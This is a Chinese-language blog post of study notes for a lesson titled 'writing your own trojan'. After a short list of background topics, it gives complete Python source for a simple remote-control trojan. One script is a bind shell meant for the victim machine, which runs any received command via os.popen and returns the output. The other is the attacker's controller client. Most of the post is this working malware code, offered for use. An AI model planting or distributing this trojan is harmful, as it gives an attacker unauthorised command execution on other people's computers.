Maxon's Blog

T3sec 学习笔记—–第十一讲-自编木马实战

6

T3SEC —–第十一讲:自编木马实战

自编 进入环境后可不依赖其他工具

自编远程控制电脑木马

涉及知识或技术:

操作系统

  • win/linux/unix/android ........
  • 命令,服务,特性.

网络协议

  • osi七层网络
  • tcp/ip 协议族群
    • 应用层
    • 传输层:tcp/udp
    • 网络层
    • 链路层

实用的程序语言

  • python
  • go
  • ruby
  • html,js
    • 环境简单
    • 弱规则语言
    • 第三方强大的标准库
    • 以及自定义的库或模块

打包工具

线上学习要素: 圈子(学习圈子),学什么怎么学,学习效果,拜师..

被攻击机:

Python
#server:放在被攻击机-木马
#gui-dos-cmd

import os
from socket import *

#创建一个连接tcp
#

qq=socket(AF_INET,SOCK_STREAM)

#绑定主机ip
address = ("",12345)
qq.bind(address)

#监听
qq.listen(5)

while True:
    pass
    newsct,clientsct=qq.accept()
    while True:
        cmd = newsct.recv(4096)
        #判断cmd是否有内容
        if len(cmd)>0:
            print("console:"+cmd.decode("utf-8"))
            #以下可做控制操作
            res=os.popen(cmd.decode('utf-8'),'r')
            newsct.send(res.read().encode('utf-8'))
            res.close()
        else:
            break
newsct.close()

攻击机:

Python
#client
#控制端

from socket import *

#创建socket内容
tcpsocket=socket(AF_INET,SOCK_STREAM)

#连接
serAddress=('127.0.0.1',12345)
tcpsocket.connect(serAddress)

#操作
while True:
    sendcmd=input("msf>>")
    if len(sendcmd)>0:
        tcpsocket.send(sendcmd.encode('utf-8'))
    else:
        break
    #/接受执行后结果
    recv=tcpsocket.recv(4096)
    print(recv.decode('utf-8'))
#关闭socket
tcpsocket.close()